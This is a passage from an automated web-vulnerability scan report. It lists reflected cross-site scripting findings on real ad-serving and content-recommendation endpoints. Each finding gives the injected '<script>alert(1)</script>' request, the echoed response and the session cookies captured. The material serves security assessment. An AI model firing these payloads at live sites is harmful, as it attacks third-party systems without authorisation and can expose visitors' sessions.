Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0f9f27"><script>alert(1)</script>1f3976d245b/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.220. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efe9"><script>alert(1)</script>c6708a262a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-18efe9"><script>alert(1)</script>c6708a262a1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.221. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054d"><script>alert(1)</script>db683bfce34 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size6054d"><script>alert(1)</script>db683bfce34=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690;adiframe=y">
...[SNIP]...

1.222. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3425e"><script>alert(1)</script>0d0a6d3f675 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 324

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=1772836903425e"><script>alert(1)</script>0d0a6d3f675;adiframe=y">
...[SNIP]...

1.223. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047e"><script>alert(1)</script>84b7f80ebaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1;adiframe=y">
...[SNIP]...

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e633"><script>alert(1)</script>acb95e1ea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 322

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8a5"><script>alert(1)</script>8134445c0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8d1"><script>alert(1)</script>4a5700d9774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79373"><script>alert(1)</script>4ced219a5aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d71e"><script>alert(1)</script>80dfd50a855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d12"><script>alert(1)</script>21c00572e4f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdaed"><script>alert(1)</script>bf9c26a8d19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ae5"><script>alert(1)</script>bae12da53c4 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4;adiframe=y">
...[SNIP]...

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43184"><script>alert(1)</script>268ab098d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 326

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1;adiframe=y">
...[SNIP]...

1.233. http://odb.outbrain.com/utils/get [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a0654<script>alert(1)</script>49c55aa1899 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/get?url=http%3A%2F%2Fuk.reuters.com%2Farticle%2FidUKTRE71C1YB20110213&callback=outbrain_rater.returnedOdbData(${json},0)a0654<script>alert(1)</script>49c55aa1899&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=34100&ref=&apv=false&rand=0.5271956750657409&sig=Ff9vsySQ HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=3c60260a-1d8b-4ff2-80ef-7d4e1a46ea5e; _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhtWmjNsOQ6c0="; _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBfGWrvBU5HcM="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1297647380027; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhlLidDM1W/uGQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBq0wY9bjkiCMEtu+eLYf3CQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 20-Feb-2011 14:24:20 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
